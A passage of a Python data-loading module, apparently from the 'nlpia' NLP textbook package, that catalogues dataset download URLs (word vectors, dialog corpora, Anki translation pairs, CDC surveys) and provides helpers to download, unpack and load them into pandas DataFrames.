>>> list(list(df.columns)[:2])
['eng', 'zsm']
>>> len(df) > 100
True
>> get_data('zsm').head(2)
eng zsm
0 Are you new? Awak baru?
1 Forget it. Lupakanlah.
"""
if os.path.isfile(language):
filepath = language
lang = re.search('[a-z]{3}-eng/', filepath).group()[:3].lower()
else:
lang = (language or 'deu').lower()[:3]
filepath = os.path.join(BIGDATA_PATH, '{}-eng'.format(lang), '{}.txt'.format(lang))
df = pd.read_table(filepath, skiprows=1, header=None)
for i, newc in enumerate(['eng', lang, 'license']):
df.columns = [newc if str(c).lower().strip().startswith(newc) else c for c in df.columns]
if newc not in df.columns and i < len(df.columns):
columns = list(df.columns)
columns[i] = newc
df.columns = columns
return df
BIG_URLS = {
'w2v': (
'https://www.dropbox.com/s/965dir4dje0hfi4/GoogleNews-vectors-negative300.bin.gz?dl=1',
1647046227,
'GoogleNews-vectors-negative300.bin.gz',
KeyedVectors.load_word2vec_format,
{'binary': True},
),
'words_google_news': (
'https://www.dropbox.com/s/9pm0js9qdjr04jy/words_google_news.txt.gz?dl=1',
3015517,
),
'glove_twitter': (
'https://nlp.stanford.edu/data/glove.twitter.27B.zip',
1520408563,
),
'glove_small': (
'https://nlp.stanford.edu/data/glove.6B.zip',
862182613,
os.path.join('glove.6B', 'glove.6B.50d.txt'),
load_glove,
),
'glove_large': (
'https://nlp.stanford.edu/data/glove.840B.300d.zip',
2176768927,
),
'glove_medium': (
'https://nlp.stanford.edu/data/glove.42B.300d.zip',
1877800501,
),
'slang': (
'https://www.dropbox.com/s/43c22018fbfzypd/slang.csv.gz?dl=1',
117633024,
),
'tweets': (
'https://www.dropbox.com/s/5gpb43c494mc8p0/tweets.csv.gz?dl=1',
311725313,
),
'crimedata': (
'https://www.dropbox.com/s/mg4yokpifu3n6u5/crimedata.csv.gz?dl=1',
2126689,
),
'cities': (
'https://www.dropbox.com/s/tcri5eyzpabhnyy/cities.csv.gz?dl=1',
8396891,
),
'cities_us_wordvectors': (
'https://www.dropbox.com/s/7ujezmo03b637q3/cities_us_wordvectors.csv.gz?dl=1',
8451128,
),
'dialog': (
'https://www.dropbox.com/s/5543bkihxflzry9/dialog.csv.gz?dl=1',
4415234,
),
'cornellmovies': (
'http://www.cs.cornell.edu/~cristian/data/cornell_movie_dialogs_corpus.zip',
9916637,
'cornell_movie_dialogs_corpus',
),
'save_dialog_tweets': (
'https://www.dropbox.com/s/tlrr9bm45uzm9yl/save_dialog_tweets.txt.gz?dl=1',
4517000,
),
'lsa_tweets': (
'https://www.dropbox.com/s/rpjt0d060t4n1mr/lsa_tweets_5589798_2003588x200.tar.gz?dl=1',
3112841563,
),
'lsa_tweets_pickle': (
'https://www.dropbox.com/s/7k0nvl2dx3hsbqp/lsa_tweets_5589798_2003588x200.pkl.projection.u.npy?dl=1',
2900000000,
),
'ubuntu_dialog_1500k': (
'https://www.dropbox.com/s/krvi79fbsryytc2/ubuntu_dialog_1500k.csv.gz?dl=1',
296098788,
),
'ubuntu_dialog_test': (
'https://www.dropbox.com/s/47mqbx0vgynvnnj/ubuntu_dialog_test.csv.gz?dl=1',
31273,
),
'imdb': (
'https://www.dropbox.com/s/yviic64qv84x73j/aclImdb_v1.tar.gz?dl=1',
84125825,
'aclImdb', # directory for extractall
load_imdb_df, # postprocessor to combine text files into a single DataFrame
),
'imdb_test': (
'https://www.dropbox.com/s/cpgrf3udzkbmvuu/aclImdb_test.tar.gz?dl=1',
10858,
'aclImdb_test', # directory for extractall
load_imdb_df,
),
'alice': (
# 'https://www.dropbox.com/s/py952zad3mntyvp/aiml-en-us-foundation-alice.v1-9.zip?dl=1',
'https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/' \
'aiml-en-us-foundation-alice/aiml-en-us-foundation-alice.v1-9.zip',
8249482,
),
# BRFSS annual mental health survey
'cdc': (
'https://www.cdc.gov/brfss/annual_data/2016/files/LLCP2016ASC.zip',
52284490,
),
}
for yr in range(2011, 2017):
BIG_URLS['cdc' + str(yr)[-2:]] = ('https://www.cdc.gov/brfss/annual_data/{yr}/files/LLCP{yr}ASC.zip'.format(yr=yr), None)
# Aliases for bigurls. Canonical name given on line by itself.
BIG_URLS['cornell'] = BIG_URLS['cornellmoviedialog'] = BIG_URLS['cornellmoviedialogs'] = BIG_URLS['cornell_movie_dialog'] = \
BIG_URLS['cornell_movie_dialogs'] = BIG_URLS['cornell_movie_dialog_corpus'] = BIG_URLS['cornell_movie_dialogs_corpus'] = \
BIG_URLS['cornellmovies']
BIG_URLS['word2vec'] = BIG_URLS['wv'] = \
BIG_URLS['w2v']
BIG_URLS['glove'] = BIG_URLS['glovesm'] = BIG_URLS['glove-sm'] = BIG_URLS['glove_sm'] = BIG_URLS['glove-small'] = \
BIG_URLS['glove_small']
BIG_URLS['ubuntu'] = BIG_URLS['ubuntu_dialog'] = \
BIG_URLS['ubuntu_dialog_1500k']
BIG_URLS['glovelg'] = BIG_URLS['glove_lg'] = BIG_URLS['glove-lg'] = BIG_URLS['glove-large'] = \
BIG_URLS['glove_large']
BIG_URLS['glovemed'] = BIG_URLS['glove_med'] = BIG_URLS['glove-med'] = BIG_URLS['glove-medium'] = \
BIG_URLS['glove_medium']
def generate_big_urls_glove(bigurls=None):
""" Generate a dictionary of URLs for various combinations of GloVe training set sizes and dimensionality """
bigurls = bigurls or {}
for num_dim in (50, 100, 200, 300):
# not all of these dimensionality, and training set size combinations were trained by Stanford
for suffixes, num_words in zip(
('sm -sm _sm -small _small'.split(),
'med -med _med -medium _medium'.split(),
'lg -lg _lg -large _large'.split()),
(6, 42, 840)
):
for suf in suffixes[:-1]:
name = 'glove' + suf + str(num_dim)
dirname = 'glove.{num_words}B'.format(num_words=num_words)
# glove.42B.300d.w2v.txt
filename = dirname + '.{num_dim}d.w2v.txt'.format(num_dim=num_dim)
# seed the alias named URL with the URL for that training set size's canonical name
bigurl_tuple = BIG_URLS['glove' + suffixes[-1]]
bigurls[name] = list(bigurl_tuple[:2])
bigurls[name].append(os.path.join(dirname, filename))
bigurls[name].append(load_glove)
bigurls[name] = tuple(bigurls[name])
return bigurls
BIG_URLS.update(generate_big_urls_glove())
ANKI_LANGUAGES = 'afr arq ara aze eus bel ben ber bul yue cat cbk cmn chv hrv ces dan nld est fin fra glg kat ' \
'deu ell heb hin hun isl ind ita jpn kha khm kor lvs lit nds mkd zsm mal mri mar max nob pes ' \
'pol por ron rus srp slk slv spa swe tgl tam tat tha tur ukr urd uig vie'.split()
ANKI_LANGUAGE_SYNONYMS = list(zip('fre esp ger french spanish german turkish turkey dut dutch'.split(),
'fra spa deu fra spa deu tur tur dan dan'.split()))
LANG2ANKI = dict((lang[:2], lang) for lang in ANKI_LANGUAGES)
"""
>>> len(ANKI_LANGUAGES) - len(LANG2ANKI)
9
"""
ENGLISHES = 'eng usa us bri british american aus australian'.split()
for lang in ANKI_LANGUAGES:
for eng in ENGLISHES:
BIG_URLS[lang] = ('http://www.manythings.org/anki/{}-eng.zip'.format(lang), 1000, '{}-{}'.format(lang, eng), load_anki_df)
BIG_URLS[lang + '-eng'] = ('http://www.manythings.org/anki/{}-eng.zip'.format(lang),
1000, '{}-{}'.format(lang, eng), load_anki_df)
for syn, lang in ANKI_LANGUAGE_SYNONYMS:
BIG_URLS[syn] = BIG_URLS[lang]
for eng in ENGLISHES:
BIG_URLS[lang + '-' + eng] = BIG_URLS[lang + '-eng']
"""
Google N-Gram Viewer meta data is from:
* [GOOGLE_NGRAM files](https://storage.googleapis.com/books/ngrams/books/datasetsv2.html)
* [GOOGLE_NGRAM data format](https://books.google.com/ngrams/info)
"""
GOOGLE_NGRAM_URL = 'http://storage.googleapis.com/books/ngrams/books/'
GOOGLE_NGRAM_NAMES = '0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o other p pos punctuation q r s t u v w x y z'.split()
GOOGLE_NGRAM_FILE = 'googlebooks-eng-all-1gram-20120701-{}.gz'
for name in GOOGLE_NGRAM_NAMES:
BIG_URLS['1gram_{}'.format(name)] = (GOOGLE_NGRAM_URL + GOOGLE_NGRAM_FILE.format(name),
1000, GOOGLE_NGRAM_FILE.format(name),
pd.read_table,
{'sep': '\t', 'header': None, 'names': 'term_pos year term_freq book_freq'.split()})
try:
BIGDATA_INFO = pd.read_csv(BIGDATA_INFO_FILE, header=0)
log.warning('Found BIGDATA index in {default} so it will overwrite nlpia.loaders.BIG_URLS !!!'.format(
default=BIGDATA_INFO_FILE))
except (IOError, pd.errors.EmptyDataError):
BIGDATA_INFO = pd.DataFrame(columns='name url file_size'.split())
log.info('No BIGDATA index found in {default} so copy {latest} to {default} if you want to "freeze" it.'.format(
default=BIGDATA_INFO_FILE, latest=BIGDATA_INFO_LATEST))
BIG_URLS.update(dict(zip(BIGDATA_INFO.name, zip(BIGDATA_INFO.url, BIGDATA_INFO.file_size))))
BIGDATA_INFO = pd.DataFrame(list(
zip(BIG_URLS.keys(), list(zip(*BIG_URLS.values()))[0], list(zip(*BIG_URLS.values()))[1])),
columns='name url file_size'.split())
BIGDATA_INFO.to_csv(BIGDATA_INFO_LATEST)
# FIXME: consolidate with DATA_INFO or BIG_URLS
DATA_NAMES = {
'pointcloud': os.path.join(DATA_PATH, 'pointcloud.csv.gz'),
'hutto_tweets0': os.path.join(DATA_PATH, 'hutto_ICWSM_2014/tweets_GroundTruth.csv.gz'),
'hutto_tweets': os.path.join(DATA_PATH, 'hutto_ICWSM_2014/tweets_GroundTruth.csv'),
'hutto_nyt': os.path.join(DATA_PATH, 'hutto_ICWSM_2014/nytEditorialSnippets_GroundTruth.csv.gz'),
'hutto_movies': os.path.join(DATA_PATH, 'hutto_ICWSM_2014/movieReviewSnippets_GroundTruth.csv.gz'),
'hutto_products': os.path.join(DATA_PATH, 'hutto_ICWSM_2014/amazonReviewSnippets_GroundTruth.csv.gz'),
}
# FIXME: put these in BIG_URLS, and test/use them with get_data()
DDL_DS_QUESTIONS_URL = 'http://minimum-entropy.districtdatalabs.com/api/questions/?format=json'
DDL_DS_ANSWERS_URL = 'http://minimum-entropy.districtdatalabs.com/api/answers/?format=json'
# Files to load into local variables like loaders.kite_text loaders.kite_history
TEXTS = ['kite_text.txt', 'kite_history.txt']
CSVS = ['mavis-batey-greetings.csv', 'sms-spam.csv']
DATA_INFO = pd.read_csv(DATA_INFO_FILE, header=0)
def rename_file(source, dest):
""" Rename (mv) file(s) from source to dest
>>> from tempfile import mkdtemp
>>> tmpdir = mkdtemp(suffix='doctest_rename_file', prefix='tmp')
>>> fout = ensure_open(os.path.join(tmpdir, 'fake_data.bin.gz'), 'w')
>>> fout.write(b'fake nlpia.loaders.rename_file')
30
>>> fout.close()
>>> dest = rename_file(os.path.join(tmpdir, 'fake_data.bin.gz'), os.path.join(tmpdir, 'Fake_Data.bin.gz'))
>>> os.path.isfile(os.path.join(tmpdir, 'Fake_Data.bin.gz'))
True
"""
log.debug('nlpia.loaders.rename_file(source={}, dest={})'.format(source, dest))
if not isinstance(source, str):
dest = [dest] if isinstance(dest, str) else dest
return [rename_file(s, d) for (s, d) in zip_longest(source, dest, fillvalue=[source, dest][int(len(source) > len(dest))])]
log.debug('nlpia.loaders.os.rename(source={}, dest={})'.format(source, dest))
if source == dest:
return dest
os.rename(source, dest)
return dest
def normalize_ext_rename(filepath):
""" normalize file ext like '.tgz' -> '.tar.gz' and '300d.txt' -> '300d.glove.txt' and rename the file
>>> pth = os.path.join(DATA_PATH, 'sms_slang_dict.txt')
>>> pth == normalize_ext_rename(pth)
True
"""
# log.warning('normalize_ext.filepath=' + str(filepath))
new_file_path = normalize_ext(filepath)
# log.warning('download_unzip.new_filepath=' + str(new_file_path))
# FIXME: fails when name is a url filename
filepath = rename_file(filepath, new_file_path)
log.warning('download_unzip.filepath=' + str(filepath))
return filepath
def untar(fname, verbose=True):
""" Uunzip and untar a tar.gz file into a subdir of the BIGDATA_PATH directory """
if fname.lower().endswith(".tar.gz"):
dirpath = os.path.join(BIGDATA_PATH, os.path.basename(fname)[:-7])
if os.path.isdir(dirpath):
return dirpath
with tarfile.open(fname) as tf:
members = tf.getmembers()
for member in tqdm(members, total=len(members)):
tf.extract(member, path=BIGDATA_PATH)
dirpath = os.path.join(BIGDATA_PATH, members[0].name)
if os.path.isdir(dirpath):
return dirpath
else:
log.warning("Not a tar.gz file: {}".format(fname))
def series_rstrip(series, endswith='/usercomments', ignorecase=True):
""" Strip a suffix str (`endswith` str) from a `df` columns or pd.Series of type str """
return series_strip(series, startswith=None, endswith=endswith, startsorendswith=None, ignorecase=ignorecase)
def series_lstrip(series, startswith='http://', ignorecase=True):
""" Strip a suffix str (`endswith` str) from a `df` columns or pd.Series of type str """
return series_strip(series, startswith=startswith, endswith=None, startsorendswith=None, ignorecase=ignorecase)
def series_strip(series, startswith=None, endswith=None, startsorendswith=None, ignorecase=True):
""" Strip a suffix/prefix str (`endswith`/`startswith` str) from a `df` columns or pd.Series of type str """
if ignorecase:
mask = series.str.lower()
endswith = endswith.lower()
else:
mask = series
if not (startsorendswith or endswith or startswith):
log.warning('In series_strip(): You must specify endswith, startswith, or startsorendswith string arguments.')
return series
if startsorendswith:
startswith = endswith = startsorendswith
if endswith:
mask = mask.str.endswith(endswith)
series[mask] = series[mask].str[:-len(endswith)]
if startswith:
mask = mask.str.endswith(startswith)
series[mask] = series[mask].str[len(startswith):]
return series
def endswith_strip(s, endswith='.txt', ignorecase=True):
""" Strip a suffix from the end of a string
>>> endswith_strip('http://TotalGood.com', '.COM')
'http://TotalGood'
>>> endswith_strip('http://TotalGood.com', endswith='.COM', ignorecase=False)
'http://TotalGood.com'
"""
if ignorecase:
if s.lower().endswith(endswith.lower()):
return s[:-len(endswith)]
else:
if s.endswith(endswith):
return s[:-len(endswith)]
return s
def startswith_strip(s, startswith='http://', ignorecase=True):
""" Strip a prefix from the beginning of a string
>>> startswith_strip('HTtp://TotalGood.com', 'HTTP://')
'TotalGood.com'
>>> startswith_strip('HTtp://TotalGood.com', startswith='HTTP://', ignorecase=False)
'HTtp://TotalGood.com'
"""
if ignorecase:
if s.lower().startswith(startswith.lower()):
return s[len(startswith):]
else:
if s.endswith(startswith):
return s[len(startswith):]
return s
def combine_dfs(dfs, index_col='index0 index1 index2'.split()):
if isinstance(dfs, 'dict'):
dfs = list(dfs.values())
def get_longest_table(url='https://www.openoffice.org/dev_docs/source/file_extensions.html', header=0):
""" Retrieve the HTML tables from a URL and return the longest DataFrame found
>>> get_longest_table('https://en.wikipedia.org/wiki/List_of_sovereign_states').columns
Index(['Common and formal names', 'Membership within the UN System[a]',
'Sovereignty dispute[b]',
'Further information on status and recognition of sovereignty[d]'],
dtype='object')
"""
dfs = pd.read_html(url, header=header)
return longest_table(dfs)
def get_leet_map():
r""" Retrieve mapping from English letters to l33t like E => 3 or A => /\ or /-\ or @ """
df = get_longest_table(
'https://sites.google.com/site/inhainternetlanguage/different-internet-languages/l33t/list-of-l33ts', header=None)
df = df.drop(index=0).iloc[:, :2]
df.columns = ['eng', 'l33t']
df['l33t'] = df['l33t'].str.split(',')
table = []
for i, row in df.iterrows():
for s in row['l33t']:
table.append((row['eng'].strip(), s.strip()))
table = pd.DataFrame(table, columns=df.columns)
leet_path = os.path.join(DATA_PATH, 'l33t.csv')
log.info('Saving l33t dictionary (character mapping) to {}'.format(leet_path))
table.to_csv(leet_path)
return table
def get_netspeak_map():
""" Retrieve mapping from chat/text abbreviations and acronyms like LMK => Let Me Know """
dfs = pd.read_html('https://www.webopedia.com/quick_ref/textmessageabbreviations.asp')
df = dfs[0].drop(index=0)
df.columns = ['abbrev', 'definition']
csv_path = os.path.join(DATA_PATH, 'netspeak.csv')
log.info('Saving netspeak dictionary (word mapping) to {}'.format(csv_path))
df.to_csv(csv_path)
return df
# more nontabular lists at 'https://simple.wikipedia.org/wiki/Leet
def longest_table(dfs):
""" Return this single longest DataFrame that among an array/list/tuple of DataFrames
Useful for automagically finding the DataFrame you want when using pd.read_html() on a Wikipedia page.
"""
sorted_indices = sorted((len(df if hasattr(df, '__len__') else []), i) for i, df in enumerate(dfs))
return dfs[sorted_indices[-1][1]]
def get_filename_extensions(url='https://tan.sfo2.digitaloceanspaces.com/midata/public/corpora/nlpia/file_extensions.html'):
""" Load a DataFrame of filename extensions from the indicated url
> df = get_filename_extensions('https://www.webopedia.com/quick_ref/fileextensionsfull.asp')
> df = get_filename_extensions('https://www.openoffice.org/dev_docs/source/file_extensions.html')
>>> df = get_filename_extensions('https://tan.sfo2.digitaloceanspaces.com/midata/public/corpora/nlpia/file_extensions.html')
>>> df.head(2)
ext description
0 .a UNIX static library file.
1 .asm Non-UNIX assembler source file.
"""
df = get_longest_table(url)
columns = list(df.columns)
columns[0] = 'ext'
columns[1] = 'description'
if len(columns) > 2:
columns[2] = 'details'
df.columns = columns
return df
#######################################################################
# Populate some local string variables with text files from DATA_PATH
for filename in TEXTS:
with ensure_open(os.path.join(DATA_PATH, filename)) as fin:
locals()[filename.split('.')[0]] = fin.read()
del fin
for filename in CSVS:
locals()['df_' + filename.split('.')[0].replace('-', '_')] = read_csv(
os.path.join(DATA_PATH, filename))
def migrate_big_urls(big_urls=BIG_URLS, inplace=True):
r""" Migrate the big_urls table schema/structure from a dict of lists to a dict of dicts
>>> big_urls = {'x': (1, 2, 3, "4x"), 'y': ("yme", "cause")}
>>> inplace = migrate_big_urls(big_urls=big_urls)
>>> inplace
{'x': {0: 1, 1: 2, 2: 3, 3: '4x'}, 'y': {0: 'yme', 1: 'cause'}}
>>> inplace is big_urls
True
>>> big_urls = {'x': [1, 2, 3, "4x"], 'y': ["yme", "cause"]}
>>> copied = migrate_big_urls(big_urls=big_urls, inplace=False)
>>> copied
{'x': {0: 1, 1: 2, 2: 3, 3: '4x'}, 'y': {0: 'yme', 1: 'cause'}}
>>> copied is big_urls
False
>>> copied['x'] is big_urls['x']
False
>>> 1 is copied['x'][0] is big_urls['x'][0]
True
"""
if not inplace:
big_urls = deepcopy(big_urls)
for name, meta in big_urls.items():
big_urls[name] = dict(zip(range(len(meta)), meta))
big_urls[name] = dict(zip(range(len(meta)), meta))
# big_urls[name]['filenames'] = [normalize_ext(big_urls)]
return big_urls
BIG_URLS = migrate_big_urls(BIG_URLS)
def normalize_glove(filepath):
r""" https://stackoverflow.com/questions/37793118/load-pretrained-glove-vectors-in-python#45894001 """
# FIXME
filepath = expand_filepath(filepath)
raise NotImplementedError()
def unzip(filepath, verbose=True):
r""" Unzip GloVE models and convert to word2vec binary models (gensim.KeyedVectors)
The only kinds of files that are returned are "*.asc" and "*.txt" and only after renaming.
"""
filepath = expand_filepath(filepath)
filename = os.path.basename(filepath)
tqdm_prog = tqdm if verbose else no_tqdm
z = ZipFile(filepath)
unzip_dir = filename.split('.')[0] if filename.split('.')[0] else os.path.splitext(filename)[0]
unzip_dir = os.path.join(BIGDATA_PATH, unzip_dir)
if not os.path.isdir(unzip_dir) or not len(os.listdir(unzip_dir)) == len(z.filelist):
z.extractall(path=unzip_dir)
log.info('unzip_dir contains: {}'.format(os.listdir(unzip_dir)))
# for f in os.listdir(unzip_dir):
# if f.lower().endswith('about.txt'):
# os.remove(os.path.join(unzip_dir, f))
for f in tqdm_prog(os.listdir(unzip_dir)):
if f[-1] in ' \t\r\n\f':
bad_path = os.path.join(unzip_dir, f)
log.warning('Stripping whitespace from end of filename: {} -> {}'.format(
repr(bad_path), repr(bad_path.rstrip())))
shutil.move(bad_path, bad_path.rstrip())
# rename_file(source=bad_path, dest=bad_path.rstrip())
anki_paths = [os.path.join(unzip_dir, f) for f in os.listdir(unzip_dir)
if f.lower()[:3] in ANKI_LANGUAGES and f.lower()[3:] == '.txt']
log.info('anki_paths: {}'.format(anki_paths))
w2v_paths = [os.path.join(BIGDATA_PATH, f[:-4] + '.w2v.txt') for f in os.listdir(unzip_dir)
if f.lower().endswith('.txt') and 'glove' in f.lower()]
for f, word2vec_output_file in zip(os.listdir(unzip_dir), w2v_paths):
glove_input_file = os.path.join(unzip_dir, f)
log.info('Attempting to converting GloVE format to Word2vec: {} -> {}'.format(
repr(glove_input_file), repr(word2vec_output_file)))
try:
glove2word2vec(glove_input_file=glove_input_file, word2vec_output_file=word2vec_output_file)
except: # noqa
log.info('Failed to convert GloVE format to Word2vec: {} -> {}'.format(
repr(glove_input_file), repr(word2vec_output_file)))
txt_paths = [os.path.join(BIGDATA_PATH, f.lower()[:-4] + '.txt') for f in os.listdir(unzip_dir) if f.lower().endswith('.asc')]
for f, txt_file in zip(os.listdir(unzip_dir), txt_paths):
if f.lower().endswith('.asc'):
input_file = os.path.join(unzip_dir, f)
log.info('Renaming .asc file to .txt: {} -> {}'.format(
repr(input_file), repr(txt_file)))
shutil.move(input_file, txt_file)
return anki_paths + txt_paths + w2v_paths
def create_big_url(name):
""" If name looks like a url, with an http, add an entry for it in BIG_URLS """
# BIG side effect
global BIG_URLS
filemeta = get_url_filemeta(name)
if not filemeta:
return None
filename = filemeta['filename']
remote_size = filemeta['remote_size']
url = filemeta['url']
name = filename.split('.')
name = (name[0] if name[0] not in ('', '.') else name[1]).replace(' ', '-')
name = name.lower().strip()
BIG_URLS[name] = (url, int(remote_size or -1), filename)
return name
def get_ftp_filemeta(parsed_url, username='anonymous', password='<EMAIL>'):
""" FIXME: Get file size, hostname, path metadata from FTP server using parsed_url (urlparse)"""
return dict(
url=parsed_url.geturl(), hostname=parsed_url.hostname, path=parsed_url.path,
username=(parsed_url.username or username),
remote_size=-1,
filename=os.path.basename(parsed_url.path))
ftp = ftplib.FTP(parsed_url.hostname)
ftp.login(username, password)
ftp.cwd(parsed_url.path)
ftp.retrbinary("RETR " + filename, open(filename, 'wb').write)
ftp.quit()
def download_unzip(names=None, normalize_filenames=False, verbose=True):
r""" Download CSV or HTML tables listed in `names`, unzip and to DATA_PATH/`names`.csv .txt etc
TODO: move to web or data_utils or futils
Also normalizes file name extensions (.bin.gz -> .w2v.bin.gz).
Uses table in data_info.csv (internal DATA_INFO) to determine URL or file path from dataset name.
Also looks
If names or [names] is a valid URL then download it and create a name
from the url in BIG_URLS (not yet pushed to data_info.csv)
"""
names = [names] if isinstance(names, (str, basestring)) else names
# names = names or list(BIG_URLS.keys()) # download them all, if none specified!
file_paths = {}
for name in names:
created = create_big_url(name)
name = (created or name).lower().strip()
if name in BIG_URLS:
filepath = download_name(name, verbose=verbose)
if not filepath:
continue
file_paths[name] = normalize_ext_rename(filepath)
log.debug('downloaded name={} to filepath={}'.format(name, file_paths[name]))
fplower = file_paths[name].lower()
if fplower.endswith('.tar.gz'):
log.info('Extracting {}'.format(file_paths[name]))
file_paths[name] = untar(file_paths[name], verbose=verbose)
log.debug('download_untar.filepaths=' + str(file_paths))
elif file_paths[name].lower().endswith('.zip'):
file_paths[name] = unzip(file_paths[name], verbose=verbose)
log.debug('download_unzip.filepaths=' + str(file_paths))
else:
df = pd.read_html(DATA_INFO['url'][name], **DATA_INFO['downloader_kwargs'][name])[-1]
df.columns = clean_columns(df.columns)
file_paths[name] = os.path.join(DATA_PATH, name + '.csv')
df.to_csv(file_paths[name])
file_paths[name] = normalize_ext_rename(file_paths[name])
return file_paths
download = download_unzip
def download_file(url, data_path=BIGDATA_PATH, filename=None, size=None, chunk_size=4096, normalize_filename=False, verbose=True):
"""Uses stream=True and a reasonable chunk size to be able to download large (GB) files over https
Downloading this small file takes 1.5 sec. All subsequent "downloads" takes .6 sec to verify path and size.
>>> import time
>>> meta = BIG_URLS['ubuntu_dialog_test']
>>> pathend = os.path.join(*('nlpia/src/nlpia/bigdata/ubuntu_dialog_test.csv.gz'.split('/')))
>>> download_file(url=meta[0], verbose=False).endswith(pathend)
True
>>> t0 = time.time()
>>> localpath = download_file(url=BIG_URLS['ubuntu_dialog_test'][0], verbose=False)
>>> t1 = time.time()
>>> localpath is None or ((0.015 < (t1 - t0) < 5.0) and localpath.endswith(pathend))
True
>>> t0 = time.time()
>>> download_file(url=meta[0], size=meta[1], verbose=False).endswith(pathend)
True
>>> time.time() - t0 < 0.02
True
"""
if isinstance(url, (list, tuple)):
return [
download_file(
s, data_path=data_path, filename=filename, size=size, chunk_size=chunk_size, verbose=verbose)
for s in url]
if url.endswith('dl=0'):
url = url[:-1] + '1' # noninteractive Dropbox download
remote_size = size
# figure out what filename to expect after download and how big it should be
if filename is None:
filename = dropbox_basename(url)
filepath = os.path.join(data_path, filename)
if normalize_filename:
filepath = normalize_filepath(filepath)
log.info('expanded+normalized file path: {}'.format(filepath))
tqdm_prog = tqdm if verbose else no_tqdm
log.info('requesting URL: {}'.format(url))
log.info('remote_size: {}'.format(remote_size))
stat = path_status(filepath)
local_size = stat.get('size', None)
log.info('local_size: {}'.format(local_size))
r = None
if not remote_size or not stat['type'] == 'file' or not local_size >= remote_size or not stat['size'] > MIN_DATA_FILE_SIZE:
try:
r = requests_get(url, stream=True, allow_redirects=True, timeout=5)
remote_size = r.headers.get('Content-Length', -1)
except ConnectionError:
log.error('ConnectionError for url: {} => request {}'.format(url, r))
remote_size = -1 if remote_size is None else remote_size
except (InvalidURL, InvalidSchema, InvalidHeader, MissingSchema) as e:
log.warning(e)
log.warning('HTTP Error for url: {}\n request: {}\n traceback: {}'.format(url, r, format_exc()))
log.warning('This can happen for Google Word Vector download links to Dropbox or Google Docs.')
try:
remote_size = int(remote_size)
except ValueError:
remote_size = -1
# remote_size has changed so need to check it again
# TODO: check md5 or get the right size of remote file
if stat['type'] == 'file' and local_size >= remote_size and stat['size'] > MIN_DATA_FILE_SIZE:
r = r.close() if r else r
log.info('retained: {}'.format(filepath))
return filepath
filedir = os.path.dirname(filepath)
created_dir = mkdir_p(filedir)
log.info('data path created: {}'.format(created_dir))
assert os.path.isdir(filedir)
assert created_dir.endswith(filedir)
bytes_downloaded = 0
if r:
log.info('downloading to: {}'.format(filepath))
with open(filepath, 'wb') as f:
for chunk in tqdm_prog(r.iter_content(chunk_size=chunk_size), total=ceil(remote_size / float(chunk_size))):
bytes_downloaded += len(chunk)
if chunk: # filter out keep-alive chunks
f.write(chunk)
r.close()
else:
log.error(f'Unable to requests.get(url={url}) using request object {r}')
return None
log.debug('nlpia.loaders.download_file: bytes={}'.format(bytes_downloaded))
stat = path_status(filepath)
log.info("local file stat {}".format(stat))
log.debug("filepath={}: local_size={}, remote_size={}, downloaded_bytes={}".format(
filepath, size, remote_size, bytes_downloaded))
return filepath
def download_name(name, verbose=True, **kwargs):
meta = BIG_URLS[name]
size = meta[1] or -1
url = meta[0]
return download_file(url=url, size=size, verbose=verbose, normalize_filename=True, **kwargs)
# for filename in meta['filenames']
def read_named_csv(name, data_path=DATA_PATH, nrows=None, verbose=True):
""" Convert a dataset in a local file (usually a CSV) into a Pandas DataFrame
TODO: should be called read_named_dataset
Args:
`name` is assumed not to have an extension (like ".csv"), alternative extensions are tried automatically.file
"""
print(f"Loading file with name: {name}")
if os.path.isfile(name):
try:
return read_json(name)
except (IOError, UnicodeDecodeError, json.JSONDecodeError):
pass
try:
return read_csv(name, nrows=nrows)
except (IOError, pd.errors.ParserError):
pass
try:
return read_text(name, nrows=nrows)
except (IOError, UnicodeDecodeError):
pass
data_path = expand_filepath(data_path)
if os.path.isfile(os.path.join(data_path, name)):
return read_csv(os.path.join(data_path, name), nrows=nrows)
if name in DATASET_NAME2FILENAME:
filename = DATASET_NAME2FILENAME[name]
if filename.lower().endswith('.txt') or filename.lower().endswith('.txt.gz'):
return read_text(os.path.join(data_path, filename), nrows=nrows)
elif filename.lower().endswith('.bin.gz'):
ipdb.set_trace()
return KeyedVectors.load_word2vec_format(os.path.join(BIGDATA_PATH, name + '.bin.gz'), binary=True)
try:
return read_csv(os.path.join(data_path, name + '.csv.gz'), nrows=nrows)
except IOError:
pass
try:
return read_csv(os.path.join(data_path, name + '.csv'), nrows=nrows)
except IOError:
pass
try:
return read_json(os.path.join(data_path, name + '.json'))
except IOError:
pass
try:
return read_text(os.path.join(data_path, name + '.txt'), verbose=verbose)
except IOError:
pass
# FIXME: mapping from short name to uncompressed filename
# BIGDATA files are usually not loadable into dataframes
filepath = os.path.join(BIGDATA_PATH, name + '.bin.gz')
if os.path.isfile(filepath):
try:
ipdb.set_trace()
return KeyedVectors.load_word2vec_format(filepath, binary=True)
except ValueError:
pass
filepath = os.path.join(BIGDATA_PATH, name + '.txt')
if os.path.isfile(filepath):
return read_text(filepath, verbose=verbose)
def get_data(name='sms-spam', nrows=None, limit=None):
r""" Load data from a json, csv, or txt file if it exists in the data dir.
References:
[cities_air_pollution_index](https://www.numbeo.com/pollution/rankings.jsp)
[cities](http://download.geonames.org/export/dump/cities.zip)
[cities_us](http://download.geonames.org/export/dump/cities_us.zip)
>>> from nlpia.data.loaders import get_data
>>> words = get_data('words_ubuntu_us')
>>> len(words)
99171
>>> list(words[:8])
['A', "A's", "AA's", "AB's", "ABM's", "AC's", "ACTH's", "AI's"]
>>> get_data('ubuntu_dialog_test').iloc[0]
Context i think we could import the old comments via r...
Utterance basically each xfree86 upload will NOT force u...
Name: 0, dtype: object
>>> df = get_data('imdb_test')
>>> df.shape
(20, 3)
>>> df.columns
Index(['url', 'rating', 'text'], dtype='object')
>>> df.describe()
rating
count 20.000000
mean 5.450000
std 3.300319
min 1.000000
25% 3.000000
50% 5.500000
75% 8.250000
max 10.000000
"""
nrows = nrows or limit
if name in BIG_URLS:
log.info('Downloading {}'.format(name))
filepaths = download_unzip(name, normalize_filenames=True)
log.debug('nlpia.loaders.get_data.filepaths=' + str(filepaths))
filepath = filepaths[name][0] if isinstance(filepaths[name], (list, tuple)) else filepaths[name]
log.debug('nlpia.loaders.get_data.filepath=' + str(filepath))
filepathlow = filepath.lower()
if len(BIG_URLS[name]) >= 4:
kwargs = BIG_URLS[name][4] if len(BIG_URLS[name]) >= 5 else {}
